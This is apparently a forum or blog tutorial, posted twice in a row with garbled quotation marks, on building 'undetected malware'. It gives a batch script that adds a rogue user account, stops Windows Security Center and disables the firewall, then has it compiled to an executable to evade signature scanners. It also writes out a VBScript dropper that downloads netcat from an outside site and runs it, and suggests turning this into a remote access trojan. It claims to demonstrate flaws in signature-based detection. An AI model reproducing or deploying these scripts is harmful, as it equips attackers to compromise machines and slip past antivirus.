This is a little smaller tutorial. It doesnt cover every little aspect. But it gets you started and more of an understanding. Lets get started!
Here some of tutorial how to make it undetected...
Roll-your-own undetected malware in 3 easy steps!
Step 1: Commands to execute
Here we compile the DOS commands that our malware will execute into a DOS batch file. As a simple proof of concept, let’s add a new user, disable the XP firewall, and create a directory on the C drive.
@echo off
net user hacksafe hacksafe /add
net stop “Security Centerâ€ÂÂ
net stop SharedAccess
netsh firewall set opmode mode=disable
mkdir c:\haxed
Save the above as a filename.bat
Step 2: Compile to an executable
Experienced DOS users may remember a number of utilities that were able to convert a batch file into an executable (com or exe). These tools basically wrap a shell call around each of our commands and bundle the whole thing up into a tiny .exe file. One of the most well known is BAT2EXEC released by PC Magazine in 1990.
creating our malware
Our tiny executable COM file is ready to go.
Step 3: Test and Deploy
We now have a custom executable that runs some obvoiusly malicious commands: disabling the firewall and adding a new user. If we were to email this file to a target, surely any modern anti-virus scanner would pick this up as a simple batch file and alert us to the malicious code… right?
No patterns exist for this new piece of malware - it’s unrecognised by signature-based scanners. Heuristics and sandboxing may alert to suspicious activity, or email filtering may prevent our executable from reaching the target, but the primary mechanism of anti-malware protection has been defeated in a matter of seconds with little knowledge or skill on the part of the attacker. If the target user were to run our executable, the only indication of malicious activity would be a command prompt quickly appearing and disappearing on the desktop.
Step 4 (Optional):
A typical malware author would take the created executable and mangle it in various ways to make it harder to detect - using tools such as encrypters, packers, scramblers and EXE binders. The malicious code may be bundled with a legitimate executable, or packed with a rootkit or other remote access utility. For more information on how malware authors avoid detection, check out our article on packers and scramblers.
Example: Creating a simple dropper
A dropper is a small piece of malware designed to “drop†another peice of malware onto a system. It usually comes in the form of a simple executable that, when executed, retrieves a file from a hardcoded web or ftp site and executes it (usually a rootkit or botnet suite).
As a proof of concept, we can create a simple dropper using VBscript in a batch file that pulls down a copy of netcat from the Hacksafe site and executes it:
echo Dim DataBin >hacksafe.vbs
echo Dim HTTPGET >>hacksafe.vbs
echo Set HTTPGET = CreateObject(â€ÂÂMicrosoft.XMLHTTPâà ¢â€šÂ¬Ã‚Â) >>hacksafe.vbs
echo HTTPGET.Open “GETâ€ÂÂ, “
http://www.hacksafe.com.au/nc.exe“
False>>hacksafe.vbs
echo HTTPGET.Send >>hacksafe.vbs
echo DataBin = HTTPGET.ResponseBody >>hacksafe.vbs
echo Const adTypeBinary=1 >>hacksafe.vbs
echo Const adSaveCreateOverWrite=2 >>hacksafe.vbs
echo Dim test1 >>hacksafe.vbs
echo Set test1 = CreateObject(â€ÂÂADODB.Streamâ₠¬Ã‚Â) >>hacksafe.vbs
echo test1.Type = adTypeBinary >>hacksafe.vbs
echo test1.Open >>hacksafe.vbs
echo test1.Write DataBin >>hacksafe.vbs
echo test1.SaveToFile “malware.exeâ€ÂÂ, adSaveCreateOverWrite >>hacksafe.vbs
hacksafe.vbs
malware.exe -h
We compile using one of the many bat conversion utilities - Bat-to-Exe Converter 1.1. (This utility packs the output file using UPX, which may cause some anti-virus scanners to flag the file as potentially suspicious).
After creating our simple dropper.exe we submit it for scan(Refer to the scan links at the bottom of the tutorial):
Loading....
Dropper scanned for malware
Nothing found. It would be unimportant to include the firewall disable command from the previous example and configure a netcat command line to listen on an incoming port and spawn a command shell. A new, undetected yet incredibly simple and obvious, remote access trojan!
It is hoped that this tutorial serves to demonstrate the fundamental flaw of signature-based malware detection systems.
Some additional points to consider:
*
A .COM file under 64kb can be renamed to an .EXE (or .scr, or .lnk, etc) and will still execute.
*
Heuristics and behaviour analysis may detect malicious activity.
*
The examples above assume XP SP2 and the user has local admin privileges.
*
Many/Most bat2exe utilities use a packer or scrambler that is recognised by signatures.
*
Anyone with programming experience can see that the above can be achieved using execve(), system().
*
This is old, old news. People were hacking BBS’s using BAT2EXE in the early 90’s!
Here some of tutorial how to make it undetected...
Roll-your-own undetected malware in 3 easy steps!
Step 1: Commands to execute
Here we compile the DOS commands that our malware will execute into a DOS batch file. As a simple proof of concept, let’s add a new user, disable the XP firewall, and create a directory on the C drive.
@echo off
net user hacksafe hacksafe /add
net stop “Security Centerâ€ÂÂ
net stop SharedAccess
netsh firewall set opmode mode=disable
mkdir c:\haxed
Save the above as a filename.bat
Step 2: Compile to an executable
Experienced DOS users may remember a number of utilities that were able to convert a batch file into an executable (com or exe). These tools basically wrap a shell call around each of our commands and bundle the whole thing up into a tiny .exe file. One of the most well known is BAT2EXEC released by PC Magazine in 1990.
creating our malware
Our tiny executable COM file is ready to go.
Step 3: Test and Deploy
We now have a custom executable that runs some obvoiusly malicious commands: disabling the firewall and adding a new user. If we were to email this file to a target, surely any modern anti-virus scanner would pick this up as a simple batch file and alert us to the malicious code… right?
No patterns exist for this new piece of malware - it’s unrecognised by signature-based scanners. Heuristics and sandboxing may alert to suspicious activity, or email filtering may prevent our executable from reaching the target, but the primary mechanism of anti-malware protection has been defeated in a matter of seconds with little knowledge or skill on the part of the attacker. If the target user were to run our executable, the only indication of malicious activity would be a command prompt quickly appearing and disappearing on the desktop.
Step 4 (Optional):
A typical malware author would take the created executable and mangle it in various ways to make it harder to detect - using tools such as encrypters, packers, scramblers and EXE binders. The malicious code may be bundled with a legitimate executable, or packed with a rootkit or other remote access utility. For more information on how malware authors avoid detection, check out our article on packers and scramblers.
Example: Creating a simple dropper
A dropper is a small piece of malware designed to “drop†another peice of malware onto a system. It usually comes in the form of a simple executable that, when executed, retrieves a file from a hardcoded web or ftp site and executes it (usually a rootkit or botnet suite).
As a proof of concept, we can create a simple dropper using VBscript in a batch file that pulls down a copy of netcat from the Hacksafe site and executes it:
echo Dim DataBin >hacksafe.vbs
echo Dim HTTPGET >>hacksafe.vbs
echo Set HTTPGET = CreateObject(â€ÂÂMicrosoft.XMLHTTPâà ¢â€šÂ¬Ã‚Â) >>hacksafe.vbs
echo HTTPGET.Open “GETâ€ÂÂ, “
http://www.hacksafe.com.au/nc.exe“
False>>hacksafe.vbs
echo HTTPGET.Send >>hacksafe.vbs
echo DataBin = HTTPGET.ResponseBody >>hacksafe.vbs
echo Const adTypeBinary=1 >>hacksafe.vbs
echo Const adSaveCreateOverWrite=2 >>hacksafe.vbs
echo Dim test1 >>hacksafe.vbs
echo Set test1 = CreateObject(â€ÂÂADODB.Streamâ₠¬Ã‚Â) >>hacksafe.vbs
echo test1.Type = adTypeBinary >>hacksafe.vbs
echo test1.Open >>hacksafe.vbs
echo test1.Write DataBin >>hacksafe.vbs
echo test1.SaveToFile “malware.exeâ€ÂÂ, adSaveCreateOverWrite >>hacksafe.vbs
hacksafe.vbs
malware.exe -h
We compile using one of the many bat conversion utilities - Bat-to-Exe Converter 1.1. (This utility packs the output file using UPX, which may cause some anti-virus scanners to flag the file as potentially suspicious).
After creating our simple dropper.exe we submit it for scan(Refer to the scan links at the bottom of the tutorial):
Loading....
Dropper scanned for malware
Nothing found. It would be unimportant to include the firewall disable command from the previous example and configure a netcat command line to listen on an incoming port and spawn a command shell. A new, undetected yet incredibly simple and obvious, remote access trojan!
It is hoped that this tutorial serves to demonstrate the fundamental flaw of signature-based malware detection systems.
Some additional points to consider:
*
A .COM file under 64kb can be renamed to an .EXE (or .scr, or .lnk, etc) and will still execute.
*
Heuristics and behaviour analysis may detect malicious activity.
*
The examples above assume XP SP2 and the user has local admin privileges.
*
Many/Most bat2exe utilities use a packer or scrambler that is recognised by signatures.
*
Anyone with programming experience can see that the above can be achieved using execve(), system().
*
This is old, old news. People were hacking BBS’s using BAT2EXE in the early 90’s!
Post a Comment